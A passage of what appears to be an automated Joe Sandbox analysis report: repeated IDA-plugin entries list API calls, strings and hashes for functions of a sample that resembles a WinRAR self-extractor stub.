                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: b31166b0def8859adbdccbce935bfc0e8c6c1acdb81e164960a3d0ccb5fa22ca
                                                            • Instruction ID: 2140ba0fb6a07ee17cf564d9befd430ec120a2371e5ad023451c40b2e7a6aff7
                                                            • Opcode Fuzzy Hash: b31166b0def8859adbdccbce935bfc0e8c6c1acdb81e164960a3d0ccb5fa22ca
                                                            • Instruction Fuzzy Hash: CD1136B61403187BE721FB70BC4EFBF769DAF51711F004210FB09E6091DBA48E0542A1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: bdfde3b0668d5278e0b7faeb6577be3e82dbbe55a78d395413f0ef8c8e4f8ac7
                                                            • Instruction ID: 409cbfee09d20cebd8b3aed9a84614a8c3248274d0c3029a62b371b85cb6e8c6
                                                            • Opcode Fuzzy Hash: bdfde3b0668d5278e0b7faeb6577be3e82dbbe55a78d395413f0ef8c8e4f8ac7
                                                            • Instruction Fuzzy Hash: 7AB1893192030AEFCF25DFA4C8859AEB7B9BF18310F14415AE8056B293D731DA66CF91
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E6FAA
                                                            • _wcslen.LIBCMT ref: 001E7013
                                                            • _wcslen.LIBCMT ref: 001E7084
                                                              • Part of subcall function 001E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001E7AAB
                                                              • Part of subcall function 001E7A9C: GetLastError.KERNEL32 ref: 001E7AF1
                                                              • Part of subcall function 001E7A9C: CloseHandle.KERNEL32(?), ref: 001E7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: f4faf69db911cf13ccaf4e86fc8e2f957fe931cbd2ab872b36c80511ea752f04
                                                            • Instruction ID: bea3ec5545b0b005bfb0efdb59585dfe4f826013f7ae3693cabe98a32c2b07b2
                                                            • Opcode Fuzzy Hash: f4faf69db911cf13ccaf4e86fc8e2f957fe931cbd2ab872b36c80511ea752f04
                                                            • Instruction Fuzzy Hash: CA412AB1D08BC47AFB20E7719C46FEEB7ACAF25300F004455FA45A31C2D7706A948721
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • EndDialog.USER32(?,00000001), ref: 001FB610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 001FB637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001FB650
                                                            • SetWindowTextW.USER32(?,?), ref: 001FB661
                                                            • GetDlgItem.USER32(?,00000065), ref: 001FB66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001FB67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 001FB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: 759fd7d68aed9fc1d2155e74ced66ed5b0a5618f2b7c5789c0e15d2ee13bbd95
                                                            • Instruction ID: c1eebaf93889de9fa5722a9ec2efedf0efa880a9403200b910032bf79050d969
                                                            • Opcode Fuzzy Hash: 759fd7d68aed9fc1d2155e74ced66ed5b0a5618f2b7c5789c0e15d2ee13bbd95
                                                            • Instruction Fuzzy Hash: BB21A332648209BBD611DB66FD8DF7B3B7DEB4BBA1F011015FB05D60A1CB6299019631
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A7D54EE3,00000001,00000000,00000000,?,?,001EAF6C,ROOT\CIMV2), ref: 001FFD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,001EAF6C,ROOT\CIMV2), ref: 001FFE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 001FFE1F
                                                            • _com_issue_error.COMSUPP ref: 001FFE48
                                                            • _com_issue_error.COMSUPP ref: 001FFE52
                                                            • GetLastError.KERNEL32(80070057,A7D54EE3,00000001,00000000,00000000,?,?,001EAF6C,ROOT\CIMV2), ref: 001FFE57
                                                            • _com_issue_error.COMSUPP ref: 001FFE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,001EAF6C,ROOT\CIMV2), ref: 001FFE80
                                                            • _com_issue_error.COMSUPP ref: 001FFE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: a1e0f2fe90afed781a9b7cc34f20912d9b57265ad9ffffa982327dca3e296b0a
                                                            • Instruction ID: 2b3252e238ff659c6a0415ce343c119fe842844e7870f0f6214a2aad086cee38
                                                            • Opcode Fuzzy Hash: a1e0f2fe90afed781a9b7cc34f20912d9b57265ad9ffffa982327dca3e296b0a
                                                            • Instruction Fuzzy Hash: 8341FA71A0021DABDB10DF64DC49BFEBBA8EF58710F11423DFA05E7292DB7499018BA4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: 555cd8128877af973d13f1336fa6204fc09320ef3ad8693366ac01ebdca106c5
                                                            • Instruction ID: 5c09ff09fbbb1ff6f47f8ddeaa472763a0db6e9b19b315f066e96bb541677389
                                                            • Opcode Fuzzy Hash: 555cd8128877af973d13f1336fa6204fc09320ef3ad8693366ac01ebdca106c5
                                                            • Instruction Fuzzy Hash: 5B718A70A00659EFDB14DFA5DC999AFBBB9FF58310B14415DF512A72A0CB30AE42CB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001E93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001E93C9
                                                              • Part of subcall function 001EC29A: _wcslen.LIBCMT ref: 001EC2A2
                                                              • Part of subcall function 001F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001EC116,00000000,.exe,?,?,00000800,?,?,?,001F8E3C), ref: 001F1FD1
                                                            • _swprintf.LIBCMT ref: 001E9465
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 001E94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 001E9514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 85b86cceb9c797bee3859074bab033cc44282dfee9500ac4012f7ca71c86a7f4
                                                            • Instruction ID: ba9f9f7a840b4a30271c90258bfcb65192aeb3158428a93f50049f686435c25f
                                                            • Opcode Fuzzy Hash: 85b86cceb9c797bee3859074bab033cc44282dfee9500ac4012f7ca71c86a7f4
                                                            • Instruction Fuzzy Hash: 5D419971900699A6CF21EB61CD45EEF737CAF65340F0448A6B64AE3051DB388B89CB60
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 001F122E
                                                              • Part of subcall function 001EB146: GetVersionExW.KERNEL32(?), ref: 001EB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 001F1251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 001F1263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 001F1274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F1284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F1294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001F12CF
                                                            • __aullrem.LIBCMT ref: 001F1379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 1ab28f87484d10cca7e11f919868c4ec5bbda490ae7c43b17f2e4e5d932f72e3
                                                            • Instruction ID: 31c360122ec6c5b994ff7cc8e9ba2c873c46cbead8db728f7bf9e8b834281b00
                                                            • Opcode Fuzzy Hash: 1ab28f87484d10cca7e11f919868c4ec5bbda490ae7c43b17f2e4e5d932f72e3
                                                            • Instruction Fuzzy Hash: A04108B1508345AFC710DF65D8849ABBBF9FF98314F10892EF69AD2210E734E649CB52
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 001E2536
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                              • Part of subcall function 001F05DA: _wcslen.LIBCMT ref: 001F05E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: 884c46740007d86e9a980f0f3268372e6674e771f70e53044d4a63842a21b999
                                                            • Instruction ID: d9a0b9b080dd4fc3835fe436b9610828d880ec379f6ff076542dc53e80860d3e
                                                            • Opcode Fuzzy Hash: 884c46740007d86e9a980f0f3268372e6674e771f70e53044d4a63842a21b999
                                                            • Instruction Fuzzy Hash: DFF12770604BC19BDB25DB2688A5BFE77DD6FA4300F08056DFD869B283CB748945C7A2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 926083f140f7cdf3d5cb2a5fb3cbd8a3cb581222fd254f7cc4608f58fe40f716
                                                            • Instruction ID: a85f423ba8eb9fec634e62a2a412a23f3fd5e87075611b4178fca8ea0b80e401
                                                            • Opcode Fuzzy Hash: 926083f140f7cdf3d5cb2a5fb3cbd8a3cb581222fd254f7cc4608f58fe40f716
                                                            • Instruction Fuzzy Hash: 08513A66B4036B95DB30BAA59C2177673E4DFA1750F79042BFFC18B1C1FB658C818261
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0020FE02,00000000,00000000,00000000,00000000,00000000,0020529F), ref: 0020F6CF
                                                            • __fassign.LIBCMT ref: 0020F74A
                                                            • __fassign.LIBCMT ref: 0020F765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0020F78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,0020FE02,00000000,?,?,?,?,?,?,?,?,?,0020FE02,00000000), ref: 0020F7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,0020FE02,00000000,?,?,?,?,?,?,?,?,?,0020FE02,00000000), ref: 0020F7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 01c1d4bf5f968e07b0c6c741dc1d5e6420281cbeacd1a0403fd660305ac2a102
                                                            • Instruction ID: a8c27066170015594143405495d20a72e7726d638f75b364912f8d91659f15a6
                                                            • Opcode Fuzzy Hash: 01c1d4bf5f968e07b0c6c741dc1d5e6420281cbeacd1a0403fd660305ac2a102
                                                            • Instruction Fuzzy Hash: A75195B1E103099FCB60CFA4DD45AEEFBF8EF09310F14816AE955E7292D670A951CB60
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 001FCE9D
                                                              • Part of subcall function 001EB690: _wcslen.LIBCMT ref: 001EB696
                                                            • _swprintf.LIBCMT ref: 001FCED1
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,0022946A), ref: 001FCEF1
                                                            • _wcschr.LIBVCRUNTIME ref: 001FCF22
                                                            • EndDialog.USER32(?,00000001), ref: 001FCFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 689974011-1360425832
                                                            • Opcode ID: 78360b20a9eebdd0171869eb2ba53c61abdabf2785190d4b391c2875fbd80051
                                                            • Instruction ID: 4068a9e6ff7b8950017466166e80027cfaf5be389bbf66310ed5ea3c4c854b31
                                                            • Opcode Fuzzy Hash: 78360b20a9eebdd0171869eb2ba53c61abdabf2785190d4b391c2875fbd80051
                                                            • Instruction Fuzzy Hash: E1416FB190025DAADF25DB90EC45AFE77BDAB15300F4080A6BA09E7041EF709A85DFA1
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00202937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0020293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 002029C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 002029F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00202A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: af8919353c5c24741ce7b4571b42a1f4844b9bf59b1be413431fd2b0f4826a75
                                                            • Instruction ID: dc5c1609e6f1bc79e45ff2deae306dc7db3f2853323ed0f041b96362a8309683
                                                            • Opcode Fuzzy Hash: af8919353c5c24741ce7b4571b42a1f4844b9bf59b1be413431fd2b0f4826a75
                                                            • Instruction Fuzzy Hash: 4941A534A20319EFCF10DF68C889A9EBBB5EF45314F248056E8156B2D3D7719A69CF90
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 001F9EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 001F9F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 001F9FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 001F9FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 001F9FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: 6478c6723ef64f981a09587e59ede55241424932eeda355ca8bd2f77501e3bc5
                                                            • Instruction ID: ab2188b81cc0cb882dc836aaaa93e0f228eb2ba9dd12faf1a22471884574d16f
                                                            • Opcode Fuzzy Hash: 6478c6723ef64f981a09587e59ede55241424932eeda355ca8bd2f77501e3bc5
                                                            • Instruction Fuzzy Hash: 9041AD76004318AFCB21AF64AC4CB6B7FA8EF49701F008559FA4E9A056CB34E915CF61
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 2ca7d9cffb32c2515cdac34b7afa8ff9a15b42c5a0c12ab7d3c0f3e3a4a54afd
                                                            • Instruction ID: a000f5b619edc039b754e5332629af8e6af6392fdb980df1ad5c0e2ca800f24b
                                                            • Opcode Fuzzy Hash: 2ca7d9cffb32c2515cdac34b7afa8ff9a15b42c5a0c12ab7d3c0f3e3a4a54afd
                                                            • Instruction Fuzzy Hash: 49319D3264434956DB34FB549C42B7B73E8FB90320F50441FF686472C1FBA1ADA183A1
                                                            APIs
                                                              • Part of subcall function 0020C868: _free.LIBCMT ref: 0020C891
                                                            • _free.LIBCMT ref: 0020C8F2
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 0020C8FD
                                                            • _free.LIBCMT ref: 0020C908
                                                            • _free.LIBCMT ref: 0020C95C
                                                            • _free.LIBCMT ref: 0020C967
                                                            • _free.LIBCMT ref: 0020C972
                                                            • _free.LIBCMT ref: 0020C97D
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: 7709388df891818f14b6d40cdcadf0b567cdfe6748675a398f094dd61d4f746b
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: D6110DB15A0B05AAE721BBB1CC07FCB7BAC9F04B00F508E15B3DD660D3DA65A5258B54
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,001FE669,001FE5CC,001FE86D), ref: 001FE605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001FE61B
